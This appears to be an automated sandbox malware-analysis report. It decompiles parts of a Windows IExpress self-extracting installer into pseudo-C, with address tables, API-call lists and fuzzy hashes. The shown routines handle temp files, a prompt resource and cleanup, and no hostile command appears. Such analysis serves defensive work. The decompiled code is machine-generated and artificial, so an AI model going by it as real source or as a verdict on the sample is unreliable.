                                                                                                                                                                                                                                              0x00976aa2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976aa6
                                                                                                                                                                                                                                              0x00976ab4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976aa8
                                                                                                                                                                                                                                              0x00976aaa
                                                                                                                                                                                                                                              0x00976aab
                                                                                                                                                                                                                                              0x00976aab
                                                                                                                                                                                                                                              0x00976abf
                                                                                                                                                                                                                                              0x00976abf
                                                                                                                                                                                                                                              0x00976ac5
                                                                                                                                                                                                                                              0x00976ad1
                                                                                                                                                                                                                                              0x00976ad7
                                                                                                                                                                                                                                              0x00976b05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976ad9
                                                                                                                                                                                                                                              0x00976ad9
                                                                                                                                                                                                                                              0x00976ae9
                                                                                                                                                                                                                                              0x00976af0
                                                                                                                                                                                                                                              0x00976af2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976af4
                                                                                                                                                                                                                                              0x00976af4
                                                                                                                                                                                                                                              0x00976afb
                                                                                                                                                                                                                                              0x00976afb
                                                                                                                                                                                                                                              0x00976af2
                                                                                                                                                                                                                                              0x00976ac7
                                                                                                                                                                                                                                              0x00976ac7
                                                                                                                                                                                                                                              0x00976ac9
                                                                                                                                                                                                                                              0x00976b0b
                                                                                                                                                                                                                                              0x00976b0b
                                                                                                                                                                                                                                              0x00976b11
                                                                                                                                                                                                                                              0x00976b13
                                                                                                                                                                                                                                              0x00976b18
                                                                                                                                                                                                                                              0x00976b1d
                                                                                                                                                                                                                                              0x00976b24
                                                                                                                                                                                                                                              0x00976b24
                                                                                                                                                                                                                                              0x00976b30
                                                                                                                                                                                                                                              0x00976b39
                                                                                                                                                                                                                                              0x00976b39
                                                                                                                                                                                                                                              0x00976b3b
                                                                                                                                                                                                                                              0x00976b42
                                                                                                                                                                                                                                              0x00976b57
                                                                                                                                                                                                                                              0x00976b5f
                                                                                                                                                                                                                                              0x00976b65
                                                                                                                                                                                                                                              0x00976b65
                                                                                                                                                                                                                                              0x00976b67
                                                                                                                                                                                                                                              0x00976b6c
                                                                                                                                                                                                                                              0x00976b6e
                                                                                                                                                                                                                                              0x00976b71
                                                                                                                                                                                                                                              0x00976b74
                                                                                                                                                                                                                                              0x00976b74
                                                                                                                                                                                                                                              0x00976b79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976b7d
                                                                                                                                                                                                                                              0x00976b81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976b83
                                                                                                                                                                                                                                              0x00976b8c
                                                                                                                                                                                                                                              0x00976b8d
                                                                                                                                                                                                                                              0x00976b90
                                                                                                                                                                                                                                              0x00976b90
                                                                                                                                                                                                                                              0x00976b83
                                                                                                                                                                                                                                              0x00976b81
                                                                                                                                                                                                                                              0x00976b94
                                                                                                                                                                                                                                              0x00976b98
                                                                                                                                                                                                                                              0x00976ba2
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976ba3
                                                                                                                                                                                                                                              0x00976bab
                                                                                                                                                                                                                                              0x00976bb0
                                                                                                                                                                                                                                              0x00976bb5
                                                                                                                                                                                                                                              0x00976bbc
                                                                                                                                                                                                                                              0x00976bbf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976bbf
                                                                                                                                                                                                                                              0x00976c1e
                                                                                                                                                                                                                                              0x00976c25
                                                                                                                                                                                                                                              0x00976c27
                                                                                                                                                                                                                                              0x00976c2d
                                                                                                                                                                                                                                              0x00976c2d
                                                                                                                                                                                                                                              0x00976c32
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976bc5
                                                                                                                                                                                                                                              0x00976bc5
                                                                                                                                                                                                                                              0x00976bc8
                                                                                                                                                                                                                                              0x00976bcc
                                                                                                                                                                                                                                              0x00976bce
                                                                                                                                                                                                                                              0x00976bce
                                                                                                                                                                                                                                              0x00976bd1
                                                                                                                                                                                                                                              0x00976bd3
                                                                                                                                                                                                                                              0x00976bd3
                                                                                                                                                                                                                                              0x00976bd6
                                                                                                                                                                                                                                              0x00976bda
                                                                                                                                                                                                                                              0x00976be1
                                                                                                                                                                                                                                              0x00976be3
                                                                                                                                                                                                                                              0x00976be5
                                                                                                                                                                                                                                              0x00976be5
                                                                                                                                                                                                                                              0x00976be6
                                                                                                                                                                                                                                              0x00976be6
                                                                                                                                                                                                                                              0x00976be9
                                                                                                                                                                                                                                              0x00976bea
                                                                                                                                                                                                                                              0x00976bea
                                                                                                                                                                                                                                              0x00976b74
                                                                                                                                                                                                                                              0x00976c39
                                                                                                                                                                                                                                              0x00976c3e
                                                                                                                                                                                                                                              0x00976c3e
                                                                                                                                                                                                                                              0x00976abe
                                                                                                                                                                                                                                              0x00976abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00977182
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetCurrentProcessId.KERNEL32 ref: 00977191
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetCurrentThreadId.KERNEL32 ref: 0097719A
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetTickCount.KERNEL32 ref: 009771A3
                                                                                                                                                                                                                                                • Part of subcall function 00977155: QueryPerformanceCounter.KERNEL32(?), ref: 009771B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,009772B8,00000058), ref: 00976A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00976AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 00976AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 00976B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00976B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 00976BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 00976BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: 7839f22cad979359ea478a3ffd50ed4f5e06803cdf65c355e1a07288db7a0eeb
                                                                                                                                                                                                                                              • Instruction ID: 94981c9157a0e2273803d5cef9970fed16f6462b25f9289fb5c251c6091cb7b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7839f22cad979359ea478a3ffd50ed4f5e06803cdf65c355e1a07288db7a0eeb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41F53395CB15CBDB219F68DC097AA7BA8BB85721F54C01AE86DE3291DF7448809B41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 631 9758c8-9758d5 632 9758d8-9758dd 631->632 632->632 633 9758df-9758f1 LocalAlloc 632->633 634 9758f3-975901 call 9744b9 633->634 635 975919-975959 call 971680 call 97658a CreateFileA LocalFree 633->635 638 975906-975910 call 976285 634->638 635->638 644 97595b-97596c CloseHandle GetFileAttributesA 635->644 645 975912-975918 638->645 644->638 646 97596e-975970 644->646 646->638 647 975972-97597b 646->647 647->645
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E009758C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E00971680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E0097658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x009758cd
                                                                                                                                                                                                                                              0x009758d1
                                                                                                                                                                                                                                              0x009758d3
                                                                                                                                                                                                                                              0x009758d5
                                                                                                                                                                                                                                              0x009758d8
                                                                                                                                                                                                                                              0x009758d8
                                                                                                                                                                                                                                              0x009758da
                                                                                                                                                                                                                                              0x009758db
                                                                                                                                                                                                                                              0x009758e1
                                                                                                                                                                                                                                              0x009758ed
                                                                                                                                                                                                                                              0x009758f1
                                                                                                                                                                                                                                              0x0097591e
                                                                                                                                                                                                                                              0x0097592c
                                                                                                                                                                                                                                              0x00975943
                                                                                                                                                                                                                                              0x0097594a
                                                                                                                                                                                                                                              0x0097594d
                                                                                                                                                                                                                                              0x00975953
                                                                                                                                                                                                                                              0x00975959
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097595b
                                                                                                                                                                                                                                              0x0097595c
                                                                                                                                                                                                                                              0x00975963
                                                                                                                                                                                                                                              0x0097596c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975972
                                                                                                                                                                                                                                              0x00975974
                                                                                                                                                                                                                                              0x0097597a
                                                                                                                                                                                                                                              0x0097597a
                                                                                                                                                                                                                                              0x0097596c
                                                                                                                                                                                                                                              0x009758f3
                                                                                                                                                                                                                                              0x00975901
                                                                                                                                                                                                                                              0x00975906
                                                                                                                                                                                                                                              0x0097590b
                                                                                                                                                                                                                                              0x00975910
                                                                                                                                                                                                                                              0x00975910
                                                                                                                                                                                                                                              0x00975918

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009758E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-1664176527
                                                                                                                                                                                                                                              • Opcode ID: c82913f6c17454af0669b8a1aff224ddadde8ea042732c5a88ea03fae5172e4f
                                                                                                                                                                                                                                              • Instruction ID: 6624126de499a5823bea03d1710143810cb3746f8c1aa0a25ee2ac0ef0cb4b4f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c82913f6c17454af0669b8a1aff224ddadde8ea042732c5a88ea03fae5172e4f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0112233718211ABD7201F79AC0DB9B7E9DEFC6364B508A25B60ED3191DAB0884592A4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009751E5(void* __eflags) {
                                                                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = E0097468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                                                                              					if(E0097468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                              						if(_t5 != 0) {
                                                                                                                                                                                                                                              							_t6 = E009744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                              							LocalFree(_t28);
                                                                                                                                                                                                                                              							if(_t6 != 6) {
                                                                                                                                                                                                                                              								 *0x979124 = 0x800704c7;
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t28);
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree(_t28);
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x979124 = E00976285();
                                                                                                                                                                                                                                              				goto L10;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x009751fb
                                                                                                                                                                                                                                              0x00975207
                                                                                                                                                                                                                                              0x0097520b
                                                                                                                                                                                                                                              0x0097523c
                                                                                                                                                                                                                                              0x00975268
                                                                                                                                                                                                                                              0x00975270
                                                                                                                                                                                                                                              0x0097528b
                                                                                                                                                                                                                                              0x00975293
                                                                                                                                                                                                                                              0x0097529c
                                                                                                                                                                                                                                              0x009752a6
                                                                                                                                                                                                                                              0x009752b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009752b0
                                                                                                                                                                                                                                              0x0097529e
                                                                                                                                                                                                                                              0x00975279
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097527b
                                                                                                                                                                                                                                              0x00975273
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975273
                                                                                                                                                                                                                                              0x0097524a
                                                                                                                                                                                                                                              0x00975250
                                                                                                                                                                                                                                              0x00975256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975256
                                                                                                                                                                                                                                              0x00975219
                                                                                                                                                                                                                                              0x00975223
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F4D,?,00000002,00000000), ref: 00975201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00975250
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: 0e9a9a094ee0c866a89b50123af3a246fce709f1d14b986570040ac5e066c9d1
                                                                                                                                                                                                                                              • Instruction ID: 70f0159255c6be6ea40552a3c9639e2b099578dc122201c9e21ea273a9202e94
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9a9a094ee0c866a89b50123af3a246fce709f1d14b986570040ac5e066c9d1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D110873318601ABE3646B715C46F3B61DDDBC9344B51C839F61ED5192FAB98C406125
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E009752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0x9791e0; // 0x3077270
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0x978a24 == 0 &&  *0x979a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0x978a24 == 0 &&  *0x979a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E00971781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              					if(( *0x979a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E009765E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E00972390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0x979a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E00971FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0x978a20 =  *0x978a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E00976CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x009752b6
                                                                                                                                                                                                                                              0x009752b6
                                                                                                                                                                                                                                              0x009752b6
                                                                                                                                                                                                                                              0x009752c1
                                                                                                                                                                                                                                              0x009752c8
                                                                                                                                                                                                                                              0x009752cb
                                                                                                                                                                                                                                              0x009752cc
                                                                                                                                                                                                                                              0x009752d4
                                                                                                                                                                                                                                              0x009752d6
                                                                                                                                                                                                                                              0x009752d7
                                                                                                                                                                                                                                              0x009752de
                                                                                                                                                                                                                                              0x009752e0
                                                                                                                                                                                                                                              0x009752f2
                                                                                                                                                                                                                                              0x009752fa
                                                                                                                                                                                                                                              0x009752fa
                                                                                                                                                                                                                                              0x00975302
                                                                                                                                                                                                                                              0x00975305
                                                                                                                                                                                                                                              0x0097530c
                                                                                                                                                                                                                                              0x00975312
                                                                                                                                                                                                                                              0x00975316
                                                                                                                                                                                                                                              0x00975316
                                                                                                                                                                                                                                              0x00975317
                                                                                                                                                                                                                                              0x0097531c
                                                                                                                                                                                                                                              0x0097531f
                                                                                                                                                                                                                                              0x00975333
                                                                                                                                                                                                                                              0x00975345
                                                                                                                                                                                                                                              0x00975351
                                                                                                                                                                                                                                              0x00975359
                                                                                                                                                                                                                                              0x00975359
                                                                                                                                                                                                                                              0x00975363
                                                                                                                                                                                                                                              0x00975369
                                                                                                                                                                                                                                              0x0097536f
                                                                                                                                                                                                                                              0x00975374
                                                                                                                                                                                                                                              0x00975374
                                                                                                                                                                                                                                              0x00975381
                                                                                                                                                                                                                                              0x00975387
                                                                                                                                                                                                                                              0x00975387
                                                                                                                                                                                                                                              0x0097538f
                                                                                                                                                                                                                                              0x009753a0

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(03077270,00000080,?,00000000), ref: 009752F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(03077270), ref: 009752FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(03077270,?,00000000), ref: 00975305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(03077270), ref: 0097530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(009711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00975363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00975334
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
